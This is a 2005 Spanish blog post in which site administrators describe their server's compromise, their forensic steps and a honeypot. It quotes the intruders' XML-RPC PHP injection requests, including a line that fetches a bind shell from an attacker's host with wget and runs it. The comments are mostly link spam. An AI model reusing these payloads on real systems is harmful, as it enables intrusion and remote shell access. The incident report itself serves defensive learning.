laBitácora.net
Nos han comprometido la máquina
28 Julio 2005Llevamos unos días que las desgracias nos persiguen, lo que ha llevado a que labitacora.net últimamente haya tenido un servicio muy irregular, parecíamos más las marismas de Guadiana que un sitio web.
Todos nuestros desatinos empezaron el pasado 13 de julio que sufrimos una intrusión por parte de unos crackers (que no hackers). Si hay algo que pone realmente nervioso a un administrador de sistemas es mirar el fichero de usuarios (/etc/passwd) y ver que tienes un nuevo usuario que no lo has creado tú y que tiene permisos de administrador (root) y si además el susodicho se llama KILL, pués para que queremos más.
En esos momentos cualquier administrador responsable, corre unos comandos para guardar la información volátil y apaga la máquina para realizar un análisis forense del sistema, nosotros como somos cualquier cosa menos eso, y además no teníamos ni idea como habían conseguido introducirse y es fundamental conocer eso para tapar lo agujeros pertinentes, tampoco teníamos mucho tiempo para estar realizando un análisis concienzudo y además somos un poco inconscientes y decidimos darnos una vuelta por el sistema estando este encendido a ver si conseguimos la información necesaria tapamos los huecos y aquí no ha pasado nada.
Es cierto que hace unos meses sufrimos un phishing por parte de unos crackers rusos y aunque fue molesto estos nunca llegaron a ser Administradores cosa que estos sí que lo habían conseguido.
Lo primero que hice fue mirar el history del root para ver que comandos habían ejecutado como tales, no había mucha cosa básicamente habían mandado un correo a la cuenta ha[email protected] supongo que para vanagloriarse de su azaña.
Luego optamos por un ps -ef para ver procesos sospechosos y allí nos aparece un proceso llamado /usr/local/bin/httpd ?. En este servidor los procesos del apache se llaman apache ya que la instalación de éste no está realizada desde los fuentes sino los paquetes de debian así que está claro que ese proceso no es nuestro, y además el fichero no existe, hago un lsof -i y veo que tengo un puerto abierto el 6667 (típico de los ircs) y que está conectado a otro 6667, la cosa apunta muy fea.
Hago un búsqueda del fichero por el disco duro y me encuentro con un script en perl que lo que hace es conectarse a un irc y se comporta como un bot de este.
La cosa no pintaba nada bien lanzo un w, who y last. Y veo que estoy sólo en la máquina pero nuestro bicho Kill ha realizado una entrada desde una máquina exterior, apunto la IP. Así que opto por borrar el usuario y por apuntar el fallo (que no será el único) de permitir acceder como root directamente. Lo que hay instalado en está máquina es una Knoppix,, y aunque es una gran distribución basada en debian para ordenadores de escritorio no está pensada para trabajar en servidores y la configuración que trae por defecto tiene ciertas opciones que no son lo suyo para servidores, aquí durante dos años tuvimos una debían woody, pero cuando se nos quemo la placa base debido a las prisas por tener el servidor funcionando optamos por una Knoppix, que no es lo suyo.
Visto que tenemos a nuestros intrusos metidos hasta la cocina realizamos un pequeño análisis forense para ver que más picias nos han hecho.
Primero buscamos ficheros y directorios ocultos y nos apareció un directorio .al muy sospechoso en /usr/share/zoneinfo con un par de backdoors y un fichero index.html con direcciones de troyanos y rootkits para linux. Como vemos todo muy reconfortante.
Luego buscamos ficheros con setuid y setguid
ls -la `find / -perm +4000 2>/dev/null`
También aparecieron unos cuantos ficheros que permitían la escalada de privilegios hasta root. Está claro que se querían asegurar de diversas formas el volver a ser root.
Buscamos ficheros recientemente modificados con ls y stats
ls / -laR –full-time | grep 2005-07-13 | cut -c 46- | sort > ficheros.txt
stats
Buscamos rootkits instalados
chkrootkit
rkhunter
No apareció nada ¿??
Buscamos logs extraños:
No existían ficheros de log, nuestros intrusos habían parado el demonio syslogd y lo habían eliminado del arranque, así que aunque se rearrancase la máquina este demonio no se ejecutaba. Además habían borrado parte de los ficheros típicos de logs (messages, syslog y daemon.log)
Curiosamente no tocaron el fichero error.log del apache donde aparecían entradas sospechosas que indicaban que se habían recibido ficheros y hasta mostraba el nombre del fichero transferido, esto fue lo primero que me hizo sospechar que la vulnerabilidad tenía que venir por el puerto 80.
Miramos los últimos accesos
last
Aquí salió el acceso del usuario Kill
Y a realizamos un pequeño análisis forense para ver que otros ficheros habían sido modificados.
Ficheros creados, modificados y accedido.
fls -r -l -f linux-ext3 -z CST -m / > /FicherosModificados.txt
Ficheros borrados
ils -f linux-ext3 -m / >> /FicherosModificados.txt
Pasamos la información a usuarios, grupos y un formato de fecha más legible
mactime -b /FicherosModificados.txt -g /reto2/hda/etc/group -p /reto2/hda/etc/passwd -z CST6CDT > /FicherosModificadosMactime.txt
dls -f linux-ext3 /imagenes/hda1.dd >> /FicherosNoalojados.txt
En el fondo demasiada información hace falta mucho tiempo y paciencia para estudiar la cantidad de información que generan estas herramientas.
Decido actualizar el sistema con los nuevos paquetes de seguridad, porque está claro que por algún agujero han tenido que entrar, es un sistema que tiene debian por el cual los paquetes que tienen algún agujero de seguridad se reparan y se ubican en otra rama, esto permite a los usuarios actualizar únicamente los paquetes que tienen fallos de seguridad.
apt-get dist-update
Sólo me actualiza el Gaim ¿???? No es muy buena señal, da la impresión que Debian tiene un poco olvidado la actualización de paquetes con agujeros de seguridad.
Llegado a este punto tengo bastante información de lo que me han hecho pero no de cómo han entrado, este servidor en su día fue un auténtico bunker e incluso tenía una página php que no mostraba los intentos de ataque, pero poco a poco fui eliminando las restricciones de seguridad y el registro de operaciones sospechosas debido a que nunca sufríamos un ataque en condiciones y comía muchísimos recursos que los necesitábamos para el funcionamiento en condiciones de la máquina. Os podéis imaginar cuanto los echaba de menos en este momento.
Para ver que posibles agujeros de seguridad tenemos opté por correr nessus y tiger, y para mi sorpresa no mostraron ninguna alerta seria, sólo unos cuantos warnings sin importancia.
La cosa estaba muy fea, aunque corrí chkrootkit instalándolo desde 0 no podía estar seguro de que no me hubiesen instalado un rootkit, es absurdo mirar módulos del kernel raros ya que Knoppix te activa muchísimos y no es fácil poder distinguir cuales son útiles y en cual puede estar por ejemplo el adore. Tampoco podía saber si me habían modificado binarios (cuanto eche de menos a tripwire) ya que debian no tiene ningún comprobador de md5 a nivel de fichero y aunque tiene la utilidad debsum (debsums -l -s) a nivel de paquete, muchos paquetes no tienen el md5 por lo que la ejecución de comando no nos dice mucho.
En este punto estaba bastante disgustado conmigo, por haber sido tan confiado, está claro que siempre puedes sufrir una intrusión, pero lo que no tiene perdón es no tener unas cuantas herramientas de loggeo y de seguimiento para poder saber que te han hecho, tampoco estaba muy contento con Debian es la única gran distribución de linux que no depende de una empresa y siempre se la ha conocido como la más portada, la más estable, ya que tiene sus tres famosas ramas, y muy segura y lo que estaba viendo de un único paquete en el repositorio de seguridad por actualizar desde hace tiempo me da que pensar que tienen un poco olvidado ese asunto y además no tener algo al estilo rpm (rpm –root=/ -Va > /rpm_md5.txt) para poder ver la integridad de los paquetes y ficheros me parece un gran error.
También detecte que nuestros “amigos” estaban mandando correos electrónicos con virus desde nuestra máquina, así que ya no me quedó más remedio que darle un apagón definitivo al servidor. Primero la quite de la red y posteriormente fue ella misma quien decidió el apagón definitivo al estropeársele la fuente de alimentación.
Para salir del paso optamos por instalar el servidor en un portátil que tenemos sin pantalla, aquí siendo conscientes de que nuestros invasores caerían sobre él les preparamos una especie de honeypot, preparamos la máquina para poder loggear todo lo que nos hiciesen y descubrir sus movimientos. Instalé un acct, un snort, capturamos todo el trafico de red con tethreal, y los logs de acceso a puertos con iptables, además lo suyo hubiese sido haber enviado los logs a otra máquina pero como no contamos con ella, los replicamos a otro directorio.
Y pusimos nuestra web como si de un tarro de miel (honeypot) se tratase esperando que cayesen las abejas.
Y efectivamente por la noche volvieron al ataque, pero esta vez les estábamos esperando. Entraron en nuestra máquina por la misma vulnerabilidad que teníamos en el anterior host y dejando todo el rastro de lo que hacían. Lo bueno, ahora, era que teníamos controlado todo lo que nos habían hecho lo malo era que teníamos la máquina comprometida y que no queríamos estar más tiempo sin servicio.
Examinando posteriormente la intrusión vimos claramente como utilizan una vulnerabilidad del php concretamente sobre el servicio xmlrpc (XML-RPC for PHP Remote Code Injection Vulnerability) para ejecutar el código que les interesa en la máquina. Cuidado porque casi todos los blogs usan el xml-rpc para propagar sus entradas, entre ellos WordPress que es lo que usamos aquí, el bug fue publicado el 29 de junio del 2005 así que se han dado prisa por usarlo, concretamente uno de los intrusos es una persona que ha reportado varias vulnerabilidades del php, pero esa es otra historia que ya contaré más adelante.
La primera petición por el puerto 80 que nos hicieron:
POST /xmlrpc.php HTTP/1.1
Host: labitacora.net
Content-Type: text/xml
Content-Length:195< ?xml version="1.0"?>
test.method
‘,'’));echo ‘_begin_
‘;echo `ls`;echo ‘_end_’;exit;/*
Posteriormente se bajan herramientas de sus webs para ejecutar: una shell y poder acceder a través de un telnet y no a través de la web.
“1.0″?>
test.method
‘,'’));echo ‘_begin_
‘;echo `cd /tmp;wget http://ekart.kocaali.com/ekart/.asc/.xpl/bindz;ls`;echo ‘_end_’;exit;/*< ?xml version="1.0"?>
test.method
‘,'’));echo ‘_begin_
‘;echo `cd /tmp;chmod 777 bindz;./bindz`;echo ‘_end_’;exit;/*
Y a partir de ahí acceden a la máquina a través de un telnet:
uid=33(www-data) gid=33(www-data) groups=33(www-data) sh-3.00$
cd /tmp
ls
Suben exploits para poder ser root ya que actualmente la shell que están ejecutando tiene los permisos del usuario de apache.
En mi caso se aprovecharon de la vulnerabilidad userlib() para conseguir permisos de administrador aunque subieron y probaron unos cuantos exploits.
A partir de hay lo que hicieron fue instalarme un rootkit concretamente el shv7
Y ejecutaron un script en perl (poor.txt) para conectarse a un irc y funcionar como bot de él.
Para colmo el ordenador original que albergaba a labitacora.net se le ha quemado la fuente de alimentación y la placa base (al final ha habido suerte y la placa funciona).
Así a día de hoy estamos funcionando con el portátil sin pantalla y comprometido aunque con unas cuantas ñapas caseras para que no puedan entrar de la misma forma que nos lo hicieron, aun así no tenemos la certeza absoluta de que no nos hayan instalado una puerta trasera que no hayamos descubierto. En cuanto nos hagamos con una nueva fuente de alimentación volveremos a reinstalar todo el sistema y esta vez lo dejaremos mejor preparado para posibles intrusiones. A un siendo conscientes que es imposible parar muchos ataques lo que si es posible es minimizar las consecuencias.
48 Responses to “Nos han comprometido la máquina”
Julio 29th, 2005 at 5:26 am
Madre mia, no ganamos para digustos.
Sólo falta que a la máquina le caiga un meteorito:
http://kirai.bitacoras.com/un-meteorito-puede-destruir-tu-ordenador/
Julio 29th, 2005 at 2:33 pm
Solo te ha faltado ser socio del Atleti.
Julio 29th, 2005 at 4:41 pm
Suerte con estos crackers, y feliz dia del administrador de sistemas.. suena ironico felicitar ante esta situación pero así es. Muy buen blog!
Agosto 1st, 2005 at 8:40 am
Con respecto a estos crackers espero que sólo quede un capítulo por escribir y que lo hagamos nosotros.
Y gracias por lo de buen blog.
Agosto 2nd, 2005 at 12:11 am
Los chicos de labitacora.net relatan el an�?¡lisis que le hicieron a su sistema al detectar que hab�?a sido comprometido, y como gracias a un honeypot que armaron descubrieron como realmente lograron el acceso al sistema y su posterior escalada de priv…
Agosto 2nd, 2005 at 12:27 pm
Siendo justo el bug es del php concretamente del XML-RPC es una especie de servicio web que proporciona php. En el aviso de la vulnerabilidad (XML-RPC for PHP Remote) que se hace en securityfocus se lo asignan a php y curiosamente antes ponían la lista de aplicaciones que estaban afectadas por la vulnerabilidad (que eran muchísimas) y ahora ponen infinidad de ..
El impacto de la vulnerabilidad es muy grande, casi todos los blog que están desarrollados en php utilizan este servicio.
La página que usan para ejecutar código arbitrario en el host es xmlrpc.php que se encuentra en el directorio del blog raíz. Php ya proporciona una nueva versión que soluciona el fallo.
Septiembre 23rd, 2005 at 4:06 pm
Caray te han hecho un daño terrible para ese momento, pero fue todo un drama de telenovelas venezolanas. Lo bien cierto es que al crakers le encanta poder superar los retos y sobre todo los considerados BUNKERS. Espero no vuelvan a entrar.
Noviembre 3rd, 2005 at 1:10 am
Los crackers nunca ganaran, mientras nosotros sigamos creando y manipulando los universos donde los demas viven. Simplemente somos mejores por que creamos lo que ellos no pueden ( solo tratan de llamar la atencion pero en verdad dan lastima )
Noviembre 17th, 2005 at 2:39 am
estoy buscando informcion sobre vulnerabilidades y me parese interesante este blog
Marzo 8th, 2006 at 1:05 am
Con mod_security no hubiera pasado.
Marzo 8th, 2006 at 2:50 am
equilibrium adjustable hawk hawked.
Abril 27th, 2006 at 8:52 pm
dying search tense stupefying sprain quavered?Ouagadougou detect blackjack http://www.randppro-cuts.com/blackjack.html
Mayo 25th, 2006 at 10:44 am
Based on cash advance ?
Mayo 25th, 2006 at 10:51 am
Will fioricet ?
Mayo 25th, 2006 at 3:13 pm
Doesn’t blackjack !
Mayo 25th, 2006 at 3:26 pm
Get started play slots .
Mayo 27th, 2006 at 4:35 am
As mentioned craps .
Mayo 27th, 2006 at 8:32 am
Any kind of gambling ?
Mayo 27th, 2006 at 6:15 pm
If you slots .
Mayo 27th, 2006 at 10:59 pm
Some baccarat ?
Junio 8th, 2006 at 8:57 pm
Respectfully hold em .
Julio 2nd, 2006 at 7:37 am
Here slots .
Julio 5th, 2006 at 3:38 am
In this case hold em .
Julio 23rd, 2006 at 12:26 am
After that bottom omaha hi lo high .
Agosto 7th, 2007 at 11:44 pm
bonjour!
epherda http://ephedra-buy-cheap-3.blogspot.com/
so long!
Agosto 17th, 2007 at 12:08 pm
Gru?schreiben
epherda http://ephedra-buy-cheap-3.blogspot.com/
leben Sie wohl!
Septiembre 26th, 2007 at 11:47 am
New links oscoda vacation pebble vacation club jamaica sesame place vacation package vacationing in arizona [URL=http://nukreol.info/vacationing-in-jamaica-resorts.htm]vacationing in jamaica resorts[/URL] [URL=http://nukreol.info/milbridge-maine-vacation-rentals.htm]milbridge maine vacation rentals[/URL] and other
Noviembre 6th, 2007 at 11:48 pm
Hola - uk leeds promotion lottery - virginia mega million lott - bc winning lotto numbers - bc lottery numbers - legion lottery - lotto and raffle laws - lotto south georgia - fllottery sincerely yours
Noviembre 11th, 2007 at 7:20 am
Blya budu, linki http://chezoloft.cej.pl - cheap zoloft - [URL=http://chezoloft.cej.pl]cheap zoloft[/url] online
Noviembre 14th, 2007 at 8:21 pm
All about site biloxi capri casino isle resort casino davenport ia sams town casino las vegas nv casino walker mn [URL=http://casino-gil.info/laughlin-nevada-casino-entertainment.html]laughlin nevada casino entertainment[/URL] [URL=http://casino-gil.info/casino-bombing.html]casino bombing[/URL] do it
Noviembre 27th, 2007 at 7:34 am
Budu v tope digitizer tablet pen tableting machines denture cleaning tablet cupid tablets [URL=http://teffe.info/806.html]dothiepin tablets[/URL] [URL=http://teffe.info/497.html]averatec tablet pc 3500[/URL] likes
Noviembre 29th, 2007 at 2:39 am
Greetings - teen pussy eater - sunbathing pussy - black pussy willow - deanna sex - 17sex - collin farrell sex video - 3dsex mpg - sydney moon pussy best regards
Noviembre 29th, 2007 at 12:30 pm
Greetings - pagan pussy - pussyfight - pettite pussy - pussy lingeries - pussycat doll stick wit u - ashleys pussy - lollita pussy - pussyfarm best regards
Diciembre 3rd, 2007 at 7:52 am
Aloha - best money making business opporunities - homework answerer - money making opportunities master resale - neopets money making cheats - runescape money making ways - secret ebay money maker - national homeworkers association - makemoney Thanks
Diciembre 3rd, 2007 at 11:06 am
[…] Hace un par de años sufrimos una intrusión que relatamos en un par de entradas: Nos han comprometido la máquina y posteriormente en Andando entre hackers, por parte de unos crackers. Los “simpáticos” nos hicieron un buen agujero y nos toco descubrir la vulnerabilidad (XML-RCP) y reinstalar todo el sistema. […]
Diciembre 6th, 2007 at 2:58 am
I am really excited. Good work, nice site! This will be my first time visiting.
..!
soma soma http://soma-buy-online-3.blogspot.com soma soma
auf baldiges Wiedersehen!
Diciembre 6th, 2007 at 8:07 pm
Aloha - columbian life insurance company - instil health insurance company - pensacola life insurance rates - fortis dental coverage - jefferson pilot dental insurance - bowie maryland health insurance leads - safegaurd dental insurance - ppp health insurance uk Thanks
Enero 17th, 2008 at 3:24 am
Budu v tope lingerie italian paris tone wacoal shadowline lingerie pink frilly lingerie closeout lingerie shower cakes [URL=http://kirecik.info/silky-teddies-lingerie.html]silky teddies lingerie[/URL] [URL=http://kirecik.info/dropshippers-plus-size-lingerie.html]dropshippers plus size lingerie[/URL] websites
Enero 21st, 2008 at 4:30 am
Do you like it? panasonic es4001 panasonic trimmer panasonic hhr p103 panasonic convection microwave ovens [URL=http://bestname8.info/610.html]panasonic th42px60[/URL] [URL=http://bestname8.info/489.html]panasonic palmcorder[/URL] good
Febrero 2nd, 2008 at 9:56 am
White appalachian college of pharmacy definition of hydrotrophy in pharmacy staffing model for inpatient pharmacy mercer college of pharmacy [URL=http://samked.info/286.html]kroger pharmacy middletown ohio[/URL] [URL=http://samked.info/531.html]nacds pharmacy[/URL] world
Febrero 5th, 2008 at 7:16 pm
I like this esol classes certification online online college degree medical dosimetry elearning litespeed online college accredited theology degree [URL=http://my-tava-e.info/88.html]online caning classes[/URL] [URL=http://my-tava-e.info/543.html]distance learning itt tech[/URL] do it
Febrero 19th, 2008 at 10:10 am
Blya budu, linki http://viagara.8x.pl - viagara - [URL=http://viagara.8x.pl]viagara[/url] http://phentramine.8x.pl - phentramine - [URL=http://phentramine.8x.pl]phentramine[/url] http://viagara.o7.pl - viagara - [URL=http://viagara.o7.pl]viagara[/url] blogs
Febrero 25th, 2008 at 11:48 am
This info about http://www.getphpbb.com/phpbb/index.php?mforum=phentramine - phentramine - [URL=http://www.getphpbb.com/phpbb/index.php?mforum=phentramine]phentramine[/url] http://oxter.host-bg.info/index.php?newsid=2 - levitra - [URL=http://oxter.host-bg.info/index.php?newsid=2]levitra[/url] http://viagara.blogsavy.com - viagara - [URL=http://viagara.blogsavy.com]viagara[/url] super
Marzo 6th, 2008 at 1:49 am
Flow columbus chrysler jeep dealer chrysler lhs 2000 parts chrysler dealers in maine bluebonnet chrysler new braunfels [URL=http://guhedlo.info/836.html]chrysler emblem[/URL] [URL=http://guhedlo.info/649.html]brandywine chrysler[/URL] write
Marzo 6th, 2008 at 2:08 am
I like this 1985 chevrolet caprice side mirror elm chevrolet 1962 chevrolet impala 409 ss chevrolet suburban factory stereo [URL=http://chevroletdomain.info/148.html]chevrolet beretta stereo wiring diagram[/URL] [URL=http://chevroletdomain.info/469.html]lynn stanley chevrolet[/URL] pages
Marzo 25th, 2008 at 11:38 am
Only koltov handbags tano handbag for sale luis viton replica handbag gucci floral horsebit handbag purse [URL=http://plifsad.info/y3-handbag-pictures.html]y3 handbag pictures[/URL] [URL=http://plifsad.info/gucci-2006-spring-summer-handbags.html]gucci 2006 spring summer handbags[/URL] good
Mayo 5th, 2008 at 11:03 pm
In bookmarks mesquite nevada casino mc 2151 pv pontoon boat mcc mnc number samsung blackjack marlowes casino chips [URL=http://ratasf.info/morongo_casino_resort_spa.html]morongo casino resort spa[/URL] [URL=http://ratasf.info/mits_wizard_software_blackjack.html]mits wizard software blackjack[/URL] super
Mayo 25th, 2008 at 9:59 pm
Offers kishwaukee community hospital scootcar magruders venison tenderloin recipe [URL=http://kijutr.gigazu.com/228.html]qualities of a expatriate employee[/URL] [URL=http://kijutr.gigazu.com/245.html]ship argyleshire[/URL] work